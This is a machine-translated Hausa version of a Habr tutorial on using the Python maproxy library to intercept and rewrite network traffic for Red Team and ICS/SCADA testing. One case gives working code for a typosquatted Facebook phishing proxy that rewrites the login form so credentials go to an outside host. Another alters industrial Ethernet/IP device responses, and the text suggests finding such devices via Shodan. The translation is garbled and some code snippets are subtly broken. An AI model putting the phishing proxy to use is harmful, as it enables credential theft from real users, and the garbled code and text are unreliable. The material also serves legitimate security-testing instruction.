An shirya fassarar labarin a jajibirin fara karatun .
Takaitawa
Daban-daban nau'ikan kimantawar tsaro, kama daga gwajin shigar yau da kullun da ayyukan ƙungiyar Red Team zuwa hacking na'urorin IoT/ICS da SCADA, sun haɗa da aiki tare da ka'idojin hanyar sadarwa na binary, wato, da gaske shiga tsakani da canza bayanan cibiyar sadarwa tsakanin abokin ciniki da manufa. Sniffing zirga-zirgar hanyar sadarwa ba abu ne mai wahala ba tunda muna da kayan aikin kamar Wireshark, Tcpdump ko Scapy, amma gyare-gyaren da alama ya zama babban aiki mai fa'ida tunda muna buƙatar samun wani nau'in dubawa don karanta bayanan cibiyar sadarwa, tace shi, canzawa. shi a kan gardama kuma aika shi zuwa ga mai masaukin baki a kusan ainihin lokaci. Bugu da ƙari, zai zama manufa idan irin wannan kayan aiki zai iya aiki ta atomatik tare da haɗin kai da yawa kuma ya zama mai daidaitawa ta amfani da rubutun.
Wata rana na gano wani kayan aiki da ake kira , takardun da sauri sun bayyana a gare ni cewa maproxy – kawai abin da nake bukata. Wannan shi ne mai sauƙi mai sauƙi, mai dacewa kuma mai sauƙin daidaitawa TCP wakili. Na gwada wannan kayan aikin akan ƙayyadaddun ƙayyadaddun aikace-aikace, gami da na'urorin ICS (waɗanda ke samar da fakiti da yawa) don ganin ko zai iya ɗaukar haɗin kai da yawa, kuma kayan aikin yayi kyau sosai.
Wannan labarin zai gabatar muku da sarrafa bayanan cibiyar sadarwa akan tashi ta amfani da maproxy.
Siffar
Kayan aiki maproxy ya dogara ne akan Tornado, sanannen kuma balagagge tsarin sadarwar asynchronous a Python.
Gabaɗaya, yana iya aiki ta hanyoyi da yawa:
TCP:TCP- haɗin TCP wanda ba a ɓoye ba;TCP:SSLиSSL:TCP- tare da boye-boye guda ɗaya;SSL:SSL– boye-boye-hanyoyi biyu.
Ya zo a matsayin ɗakin karatu. Don farawa mai sauri, zaku iya amfani da fayilolin misali waɗanda ke nuna babban :
all.pycertificate.pemlogging_proxy.pyprivatekey.pemssl2ssl.pyssl2tcp.pytcp2ssl.pytcp2tcp.py
Case 1 - wakili mai sauƙi na bidirectional
Bisa ga tcp2tcp.py:
#!/usr/bin/env python
import tornado.ioloop
import maproxy.proxyserver
server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
tornado.ioloop.IOLoop.instance().start()
da default ProxyServer() yana ɗaukar muhawara guda biyu - wurin haɗin gwiwa da tashar tashar manufa. server.listen() yana ɗaukar hujja ɗaya - tashar jiragen ruwa don sauraron haɗin mai shigowa.
Ana aiwatar da rubutun:
# python tcp2tcp.py
Domin gudanar da gwajin, za mu haɗa zuwa uwar garken SSH na gida ta hanyar rubutun wakili, wanda ke saurare a kunne. 2222/tcp tashar jiragen ruwa kuma yana haɗi zuwa madaidaicin tashar jiragen ruwa 22/tcp Sabar SSH:
Tutar maraba tana sanar da ku cewa rubutun misalin mu ya sami nasarar wakilcin zirga-zirgar hanyar sadarwa.
Case 2 - gyare-gyaren bayanai
Wani rubutun demo logging_proxy.py manufa don hulɗa tare da bayanan cibiyar sadarwa. Bayanan da ke cikin fayil ɗin sun bayyana hanyoyin aji waɗanda zaku iya gyara don cimma burin ku:
Abu mafi ban sha'awa shine a nan:
on_c2p_done_read- don satar bayanai a kan hanya daga abokin ciniki zuwa uwar garken;on_p2s_done_read- koma baya.
Bari mu gwada canza banner SSH wanda uwar garken ke komawa ga abokin ciniki:
[…]
def on_p2s_done_read(self,data):
data = data.replace("OpenSSH", "DumnySSH")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
[…]aiwatar da rubutun:
Kamar yadda kake gani, an yaudari abokin ciniki saboda sunan uwar garken SSH na sa an canza shi zuwa «DumnySSH».
Case 3 – Shafin yanar gizo mai sauƙi na phishing
Akwai hanyoyi marasa iyaka don amfani da wannan kayan aiki. A wannan karon bari mu mai da hankali kan wani abu mafi amfani daga bangaren ayyukan Red Team. Mu yi koyi da shafin saukarwa m.facebook.com kuma yi amfani da yanki na al'ada tare da buga rubutu da gangan, misali, m.facebok.com. Don dalilai na nunawa, bari kawai mu ɗauka cewa yankin yana da rajista ta wurinmu.
Za mu kafa hanyar sadarwar da ba a ɓoye ba tare da wakili na waɗanda abin ya shafa da SSL Stream zuwa uwar garken Facebook (31.13.81.36). Don sa wannan misalin ya yi aiki, muna buƙatar musanya taken uwar garken HTTP da allura madaidaicin sunan mai masauki, kuma za mu hana matsawa martani ta yadda za mu iya samun damar abubuwan cikin cikin sauƙi. Daga karshe za mu maye gurbin HTML form domin a aiko mana da bayanan shiga maimakon sabar Facebook:
[…]
def on_c2p_done_read(self,data):
# replace Host header
data = data.replace("Host: m.facebok.com", "Host: m.facebook.com")
# disable compression
data = data.replace("gzip", "identity;q=0")
data = data.replace("deflate", "")
super(LoggingSession,self).on_c2p_done_read(data)
[…]
def on_p2s_done_read(self,data):
# partial replacement of response
data = data.replace("action="/ha/login/", "action="https://redteam.pl/")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("31.13.81.36",443, session_factory=LoggingSessionFactory(), server_ssl_options=True)
server.listen(80)
[…]A takaice:
Kamar yadda kuke gani, mun sami nasarar maye gurbin asalin rukunin yanar gizon.
Case 4 - Porting Ethernet/IP
Na jima ina mu'amala da na'urorin masana'antu da software (ICS/SCADA) na ɗan lokaci, kamar su masu sarrafa shirye-shirye (PLC), I/O modules, drives, relays, mahallin shirye-shiryen tsani da ƙari mai yawa. Wannan shari'ar ga waɗanda suke son abubuwan masana'antu. Hacking irin waɗannan hanyoyin sun haɗa da yin wasa tare da ka'idojin cibiyar sadarwa. A cikin misali mai zuwa, Ina so in nuna yadda zaku iya canza zirga-zirgar hanyar sadarwa ta ICS/SCADA.
Don wannan kuna buƙatar waɗannan abubuwa:
- Mai satar hanyar sadarwa, alal misali, Wireshark;
- Ethernet/IP ko kawai na'urar SIP, zaka iya samun ta ta amfani da sabis na Shodan;
- Rubutun mu ya dogara ne akan
maproxy.
Da farko, bari mu kalli yadda martanin ganowa na yau da kullun daga CIP (Common Industrial Protocol) yayi kama da:
Ana aiwatar da gano na'urar ta amfani da ka'idar Ethernet/IP, wanda shine ingantacciyar sigar ka'idar Ethernet masana'antu wacce ke kunshe ka'idojin sarrafawa kamar CIP. Za mu canza sunan ID mai haske wanda yake bayyane a cikin hoton "NI-IndComm don Ethernet" ta amfani da rubutun wakili. Za mu iya sake amfani da rubutun logging_proxy.py haka kuma gyara tsarin aji on_p2s_done_read, saboda muna son sunan daban ya kasance a bayyane akan abokin ciniki.
Lambar:
[…]
def on_p2s_done_read(self,data):
# partial replacement of response
# Checking if we got List Identity message response
if data[26:28] == b'x0cx00':
print('Got response, replacing')
data = data[:63] + 'DUMMY31337'.encode('utf-8') + data[63+10:]
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("1.3.3.7",44818,session_factory=LoggingSessionFactory())
server.listen(44818)
[…]
Ainihin, mun nemi gano na'urar sau biyu, amsa ta biyu ita ce ta asali, kuma na farko an canza shi akan tashi.
Kuma na ƙarshe
A ganina maproxy Kayan aiki mai dacewa kuma mai sauƙi, wanda kuma aka rubuta a cikin Python, don haka na yi imanin cewa ku ma za ku iya amfana daga amfani da shi. Tabbas, akwai ƙarin kayan aiki masu rikitarwa don sarrafawa da canza bayanan cibiyar sadarwa, amma kuma suna buƙatar ƙarin kulawa kuma galibi ana ƙirƙira su don takamaiman yanayin amfani, misali. , ko ga lokuta kama da na uku, ko ga shari'ar karshe. Wata hanya ko wata, tare da taimako maproxy za ku iya hanzarta aiwatar da ra'ayoyinku don kutse bayanan cibiyar sadarwa, tunda rubutun misali a bayyane yake.
source: www.habr.com